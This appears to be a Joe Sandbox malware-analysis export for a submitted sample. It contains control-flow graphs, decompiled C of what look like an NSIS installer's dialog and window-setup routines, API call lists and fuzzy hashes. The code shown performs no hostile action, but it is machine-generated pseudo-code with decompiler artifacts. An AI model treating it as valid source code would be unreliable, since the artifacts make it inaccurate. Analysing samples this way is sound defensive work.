                                                                                      control_flow_graph 194 403f9a-403fac 195 403fb2-403fb8 194->195 196 404113-404122 194->196 195->196 197 403fbe-403fc7 195->197 198 404171-404186 196->198 199 404124-40416c GetDlgItem * 2 call 404499 SetClassLongW call 40140b 196->199 202 403fc9-403fd6 SetWindowPos 197->202 203 403fdc-403fe3 197->203 200 4041c6-4041cb call 4044e5 198->200 201 404188-40418b 198->201 199->198 216 4041d0-4041eb 200->216 205 40418d-404198 call 401389 201->205 206 4041be-4041c0 201->206 202->203 208 403fe5-403fff ShowWindow 203->208 209 404027-40402d 203->209 205->206 230 40419a-4041b9 SendMessageW 205->230 206->200 215 404466 206->215 217 404100-40410e call 404500 208->217 218 404005-404018 GetWindowLongW 208->218 211 404046-404049 209->211 212 40402f-404041 DestroyWindow 209->212 222 40404b-404057 SetWindowLongW 211->222 223 40405c-404062 211->223 219 404443-404449 212->219 221 404468-40446f 215->221 226 4041f4-4041fa 216->226 227 4041ed-4041ef call 40140b 216->227 217->221 218->217 228 40401e-404021 ShowWindow 218->228 219->215 233 40444b-404451 219->233 222->221 223->217 229 404068-404077 GetDlgItem 223->229 234 404200-40420b 226->234 235 404424-40443d DestroyWindow EndDialog 226->235 227->226 228->209 237 404096-404099 229->237 238 404079-404090 SendMessageW IsWindowEnabled 229->238 230->221 233->215 239 404453-40445c ShowWindow 233->239 234->235 236 404211-40425e call 40657a call 404499 * 3 GetDlgItem 234->236 235->219 266 404260-404265 236->266 267 404268-4042a4 ShowWindow KiUserCallbackDispatcher call 4044bb EnableWindow 236->267 241 40409b-40409c 237->241 242 40409e-4040a1 237->242 238->215 238->237 239->215 244 4040cc-4040d1 call 404472 241->244 245 4040a3-4040a9 242->245 246 4040af-4040b4 242->246 244->217 249 4040ea-4040fa SendMessageW 245->249 250 4040ab-4040ad 245->250 246->249 251 4040b6-4040bc 246->251 249->217 250->244 254 4040d3-4040dc call 40140b 251->254 255 4040be-4040c4 call 40140b 251->255 254->217 264 4040de-4040e8 254->264 262 4040ca 255->262 262->244 264->262 266->267 270 4042a6-4042a7 267->270 271 4042a9 267->271 272 4042ab-4042d9 GetSystemMenu EnableMenuItem SendMessageW 270->272 271->272 273 4042db-4042ec SendMessageW 272->273 274 4042ee 272->274 275 4042f4-404333 call 4044ce call 403f7b call 40653d lstrlenW call 40657a SetWindowTextW call 401389 273->275 274->275 275->216 286 404339-40433b 275->286 286->216 287 404341-404345 286->287 288 404364-404378 DestroyWindow 287->288 289 404347-40434d 287->289 288->219 291 40437e-4043ab CreateDialogParamW 288->291 289->215 290 404353-404359 289->290 290->216 292 40435f 290->292 291->219 293 4043b1-404408 call 404499 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 291->293 292->215 293->215 298 40440a-40441d ShowWindow call 4044e5 293->298 300 404422 298->300 300->219
                                                                                      C-Code - Quality: 84%
                                                                                      			E00403F9A(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x42d250 = _t34;
					if(_t130 == 0x110) {
						 *0x434f08 = _t127;
						 *0x42d264 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b230 = _t91;
						E00404499(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x433ee8);
						 *0x433ecc = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x42d250 = 1;
					}
					_t124 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x434f20;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044E5(0x40b);
						while(1) {
							_t36 =  *0x42d250;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x0
							__eflags = _t38 -  *0x434f24;
							if(_t38 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433ecc - _t136;
							if( *0x433ecc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E0040657A(_t117, _t127, _t133, 0x445000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404499(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404499(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x434f8c - _t136;
							_v28 = _t48;
							if( *0x434f8c != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E004044BB(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x42b230, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d264);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x42b230);
							}
							E004044CE();
							E0040653D(0x42d268, E00403F7B());
							E0040657A(0x42d268, _t127, _t133,  &(0x42d268[lstrlenW(0x42d268)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x42d268); // executed
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433ed8); // executed
									 *0x42c240 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x434f00,  *_t133 +  *0x433ee0 & 0x0000ffff, _t127,  *( *(_t133 + 4) * 4 + "XF@"), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x433ed8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404499(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x433ed8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433ecc - _t136;
									if( *0x433ecc != _t136) {
										goto L63;
									}
									ShowWindow( *0x433ed8, 8); // executed
									E004044E5(0x405);
									goto L60;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L63;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x433ed8);
						 *0x434f08 = _t136;
						EndDialog(_t127,  *0x42ba38);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x433ed8, 0x40f, 0, 1);
						__eflags =  *0x433ecc;
						return 0 |  *0x433ecc == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x42d248, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x433ed8, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x434f8c - _t136;
											if( *0x434f8c == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x42ba38 = 1;
												L23:
												_push(0x78);
												L24:
												E00404472();
												goto L28;
											}
											E0040140B(_t129);
											 *0x42ba38 = _t129;
											goto L23;
										}
										__eflags =  *0x40a368 - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x433ed8);
						 *0x433ed8 = _t122;
						L60:
						_t145 =  *0x42f268 - _t136; // 0x1
						if(_t145 == 0 &&  *0x433ed8 != _t136) {
							ShowWindow(_t127, 0xa); // executed
							 *0x42f268 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x42d248,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E00404500(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                                                                      0x00403fa5
                                                                                      0x00403fac
                                                                                      0x00404113
                                                                                      0x00404117
                                                                                      0x0040411b
                                                                                      0x0040411d
                                                                                      0x00404122
                                                                                      0x0040412d
                                                                                      0x00404138
                                                                                      0x0040413d
                                                                                      0x0040413f
                                                                                      0x00404141
                                                                                      0x00404144
                                                                                      0x00404149
                                                                                      0x00404157
                                                                                      0x00404164
                                                                                      0x0040416b
                                                                                      0x0040416b
                                                                                      0x0040416c
                                                                                      0x0040416c
                                                                                      0x00404171
                                                                                      0x00404177
                                                                                      0x0040417e
                                                                                      0x00404184
                                                                                      0x00404186
                                                                                      0x004041c6
                                                                                      0x004041cb
                                                                                      0x004041d0
                                                                                      0x004041d0
                                                                                      0x004041d5
                                                                                      0x004041de
                                                                                      0x004041e0
                                                                                      0x004041e5
                                                                                      0x004041eb
                                                                                      0x004041ef
                                                                                      0x004041ef
                                                                                      0x004041f4
                                                                                      0x004041fa
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404205
                                                                                      0x0040420b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404214
                                                                                      0x0040421c
                                                                                      0x00404221
                                                                                      0x00404224
                                                                                      0x0040422a
                                                                                      0x0040422f
                                                                                      0x00404232
                                                                                      0x00404238
                                                                                      0x0040423d
                                                                                      0x00404240
                                                                                      0x00404246
                                                                                      0x0040424e
                                                                                      0x00404254
                                                                                      0x0040425a
                                                                                      0x0040425e
                                                                                      0x00404265
                                                                                      0x00404265
                                                                                      0x00404265
                                                                                      0x0040426f
                                                                                      0x00404281
                                                                                      0x0040428d
                                                                                      0x00404292
                                                                                      0x0040429c
                                                                                      0x004042a2
                                                                                      0x004042a4
                                                                                      0x004042a9
                                                                                      0x004042a6
                                                                                      0x004042a6
                                                                                      0x004042a6
                                                                                      0x004042b9
                                                                                      0x004042d1
                                                                                      0x004042d3
                                                                                      0x004042d9
                                                                                      0x004042ee
                                                                                      0x004042db
                                                                                      0x004042e4
                                                                                      0x004042e6
                                                                                      0x004042e6
                                                                                      0x004042f4
                                                                                      0x00404305
                                                                                      0x0040431b
                                                                                      0x00404322
                                                                                      0x00404328
                                                                                      0x0040432c
                                                                                      0x00404331
                                                                                      0x00404333
                                                                                      0x00000000
                                                                                      0x00404339
                                                                                      0x00404339
                                                                                      0x0040433b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404341
                                                                                      0x00404345
                                                                                      0x0040436a
                                                                                      0x00404370
                                                                                      0x00404376
                                                                                      0x00404378
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040439e
                                                                                      0x004043a4
                                                                                      0x004043a6
                                                                                      0x004043ab
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004043b1
                                                                                      0x004043b4
                                                                                      0x004043b7
                                                                                      0x004043ce
                                                                                      0x004043da
                                                                                      0x004043f3
                                                                                      0x004043f9
                                                                                      0x004043fd
                                                                                      0x00404402
                                                                                      0x00404408
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404412
                                                                                      0x0040441d
                                                                                      0x00000000
                                                                                      0x0040441d
                                                                                      0x00404347
                                                                                      0x0040434d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404353
                                                                                      0x00404359
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040435f
                                                                                      0x00404333
                                                                                      0x0040442a
                                                                                      0x00404436
                                                                                      0x0040443d
                                                                                      0x00000000
                                                                                      0x00404188
                                                                                      0x00404188
                                                                                      0x0040418b
                                                                                      0x004041be
                                                                                      0x004041be
                                                                                      0x004041c0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004041c0
                                                                                      0x0040418d
                                                                                      0x00404191
                                                                                      0x00404196
                                                                                      0x00404198
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004041a8
                                                                                      0x004041b0
                                                                                      0x00000000
                                                                                      0x004041b6
                                                                                      0x00403fbe
                                                                                      0x00403fbe
                                                                                      0x00403fc2
                                                                                      0x00403fc7
                                                                                      0x00403fd6
                                                                                      0x00403fd6
                                                                                      0x00403fdc
                                                                                      0x00403fe3
                                                                                      0x00404027
                                                                                      0x0040402d
                                                                                      0x00404046
                                                                                      0x00404049
                                                                                      0x0040405c
                                                                                      0x00404062
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00404068
                                                                                      0x00404073
                                                                                      0x00404075
                                                                                      0x00404077
                                                                                      0x00404096
                                                                                      0x00404096
                                                                                      0x00404099
                                                                                      0x0040409e
                                                                                      0x004040a1
                                                                                      0x004040b1
                                                                                      0x004040b2
                                                                                      0x004040b4
                                                                                      0x004040ea
                                                                                      0x004040fa
                                                                                      0x00000000
                                                                                      0x004040fa
                                                                                      0x004040b6
                                                                                      0x004040bc
                                                                                      0x004040d5
                                                                                      0x004040da
                                                                                      0x004040dc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004040de
                                                                                      0x004040ca
                                                                                      0x004040ca
                                                                                      0x004040cc
                                                                                      0x004040cc
                                                                                      0x00000000
                                                                                      0x004040cc
                                                                                      0x004040bf
                                                                                      0x004040c4
                                                                                      0x00000000
                                                                                      0x004040c4
                                                                                      0x004040a3
                                                                                      0x004040a9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004040ab
                                                                                      0x00000000
                                                                                      0x004040ab
                                                                                      0x0040409b
                                                                                      0x00000000
                                                                                      0x0040409b
                                                                                      0x00404081
                                                                                      0x00404088
                                                                                      0x0040408e
                                                                                      0x00404090
                                                                                      0x00404466
                                                                                      0x00000000
                                                                                      0x00404466
                                                                                      0x00000000
                                                                                      0x00404090
                                                                                      0x0040404e
                                                                                      0x00000000
                                                                                      0x00404056
                                                                                      0x00404035
                                                                                      0x0040403b
                                                                                      0x00404443
                                                                                      0x00404443
                                                                                      0x00404449
                                                                                      0x00404456
                                                                                      0x0040445c
                                                                                      0x0040445c
                                                                                      0x00000000
                                                                                      0x00403fe5
                                                                                      0x00403fea
                                                                                      0x00403ff6
                                                                                      0x00403fff
                                                                                      0x00404100
                                                                                      0x00000000
                                                                                      0x0040401e
                                                                                      0x00404021
                                                                                      0x00000000
                                                                                      0x00404021
                                                                                      0x00403fff
                                                                                      0x00403fe3

                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                      • ShowWindow.USER32(?), ref: 00403FF6
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                      • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                      • DestroyWindow.USER32 ref: 00404035
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                      • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                      • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                      • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                      • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                      • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                      • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 121052019-0
                                                                                      • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                      • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                      • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                      • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403BEC Relevance: 44.0, APIs: 13, Strings: 12, Instructions: 215stringregistryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 301 403bec-403c04 call 40690a 304 403c06-403c16 call 406484 301->304 305 403c18-403c4f call 40640b 301->305 314 403c72-403c9b call 403ec2 call 405f14 304->314 310 403c51-403c62 call 40640b 305->310 311 403c67-403c6d lstrcatW 305->311 310->311 311->314 319 403ca1-403ca6 314->319 320 403d2d-403d35 call 405f14 314->320 319->320 321 403cac-403cc6 call 40640b 319->321 326 403d43-403d68 LoadImageW 320->326 327 403d37-403d3e call 40657a 320->327 325 403ccb-403cd4 321->325 325->320 328 403cd6-403cda 325->328 330 403de9-403df1 call 40140b 326->330 331 403d6a-403d9a RegisterClassW 326->331 327->326 332 403cec-403cf8 lstrlenW 328->332 333 403cdc-403ce9 call 405e39 328->333 344 403df3-403df6 330->344 345 403dfb-403e06 call 403ec2 330->345 334 403da0-403de4 SystemParametersInfoW CreateWindowExW 331->334 335 403eb8 331->335 339 403d20-403d28 call 405e0c call 40653d 332->339 340 403cfa-403d08 lstrcmpiW 332->340 333->332 334->330 338 403eba-403ec1 335->338 339->320 340->339 343 403d0a-403d14 GetFileAttributesW 340->343 347 403d16-403d18 343->347 348 403d1a-403d1b call 405e58 343->348 344->338 354 403e0c-403e26 ShowWindow call 40689a 345->354 355 403e8f-403e90 call 405672 345->355 347->339 347->348 348->339 360 403e32-403e44 GetClassInfoW 354->360 361 403e28-403e2d call 40689a 354->361 359 403e95-403e97 355->359 362 403eb1-403eb3 call 40140b 359->362 363 403e99-403e9f 359->363 367 403e46-403e56 GetClassInfoW RegisterClassW 360->367 368 403e5c-403e7f DialogBoxParamW call 40140b 360->368 361->360 362->335 363->344 364 403ea5-403eac call 40140b 363->364 364->344 367->368 372 403e84-403e8d call 403b3c 368->372 372->338
                                                                                      C-Code - Quality: 96%
                                                                                      			E00403BEC(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x434f10;
				_t22 = E0040690A(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x42d268;
					L"1033" = 0x30;
					 *0x442002 = 0x78;
					 *0x442004 = 0;
					E0040640B(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x42d268, 0);
					__eflags =  *0x42d268;
					if(__eflags == 0) {
						E0040640B(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x42d268, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00406484(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403EC2(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp";
				 *0x434f80 =  *0x434f18 & 0x00000020;
				 *0x434f9c = 0x10000;
				if(E00405F14(_t90, L"C:\\Users\\Arthur\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405F14(_t98, _t86) == 0) {
						E0040657A(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x434f00, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x433ee8 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403EC2(_t78, __eflags);
							__eflags =  *0x434fa0;
							if( *0x434fa0 != 0) {
								_t33 = E00405672(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x433ecc;
								if( *0x433ecc == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x42d248, 5); // executed
							_t39 = E0040689A("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040689A("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x433ea0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x433ea0);
								 *0x433ec4 = _t87;
								RegisterClassW(0x433ea0);
							}
							_t44 = DialogBoxParamW( *0x434f00,  *0x433ee0 + 0x00000069 & 0x0000ffff, 0, E00403F9A, 0); // executed
							E00403B3C(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x434f00;
						 *0x433ea4 = E00401000;
						 *0x433eb0 =  *0x434f00;
						 *0x433eb4 = _t30;
						 *0x433ec4 = 0x40a380;
						if(RegisterClassW(0x433ea0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x42d248 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x434f00, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x432ea0;
					E0040640B(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x434f38 + _t78 * 2,  *0x434f38 +  *(_t82 + 0x4c) * 2, 0x432ea0, 0);
					_t63 =  *0x432ea0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x432ea2;
						 *((short*)(E00405E39(0x432ea2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040653D(_t86, E00405E0C(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405E58(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}
























                                                                                      0x00403bf2
                                                                                      0x00403bfb
                                                                                      0x00403c02
                                                                                      0x00403c04
                                                                                      0x00403c18
                                                                                      0x00403c2a
                                                                                      0x00403c33
                                                                                      0x00403c3c
                                                                                      0x00403c43
                                                                                      0x00403c48
                                                                                      0x00403c4f
                                                                                      0x00403c62
                                                                                      0x00403c62
                                                                                      0x00403c6d
                                                                                      0x00403c06
                                                                                      0x00403c11
                                                                                      0x00403c11
                                                                                      0x00403c72
                                                                                      0x00403c7c
                                                                                      0x00403c85
                                                                                      0x00403c8a
                                                                                      0x00403c9b
                                                                                      0x00403d2d
                                                                                      0x00403d35
                                                                                      0x00403d3e
                                                                                      0x00403d3e
                                                                                      0x00403d54
                                                                                      0x00403d5a
                                                                                      0x00403d68
                                                                                      0x00403de9
                                                                                      0x00403df1
                                                                                      0x00403dfb
                                                                                      0x00403e00
                                                                                      0x00403e06
                                                                                      0x00403e90
                                                                                      0x00403e95
                                                                                      0x00403e97
                                                                                      0x00403eb3
                                                                                      0x00000000
                                                                                      0x00403eb3
                                                                                      0x00403e99
                                                                                      0x00403e9f
                                                                                      0x00403ea7
                                                                                      0x00403ea7
                                                                                      0x00000000
                                                                                      0x00403e9f
                                                                                      0x00403e14
                                                                                      0x00403e1f
                                                                                      0x00403e24
                                                                                      0x00403e26
                                                                                      0x00403e2d
                                                                                      0x00403e2d
                                                                                      0x00403e38
                                                                                      0x00403e40
                                                                                      0x00403e42
                                                                                      0x00403e44
                                                                                      0x00403e4d
                                                                                      0x00403e50
                                                                                      0x00403e56
                                                                                      0x00403e56
                                                                                      0x00403e75
                                                                                      0x00403e86
                                                                                      0x00000000
                                                                                      0x00403e8b
                                                                                      0x00403df3
                                                                                      0x00403df5
                                                                                      0x00000000
                                                                                      0x00403d6a
                                                                                      0x00403d6a
                                                                                      0x00403d76
                                                                                      0x00403d80
                                                                                      0x00403d86
                                                                                      0x00403d8b
                                                                                      0x00403d9a
                                                                                      0x00403eb8
                                                                                      0x00403eb8
                                                                                      0x00000000
                                                                                      0x00403eb8
                                                                                      0x00403da9
                                                                                      0x00403de4
                                                                                      0x00000000
                                                                                      0x00403de4
                                                                                      0x00403ca1
                                                                                      0x00403ca1
                                                                                      0x00403ca4
                                                                                      0x00403ca6
                                                                                      0x00000000
                                                                                      0x00000000
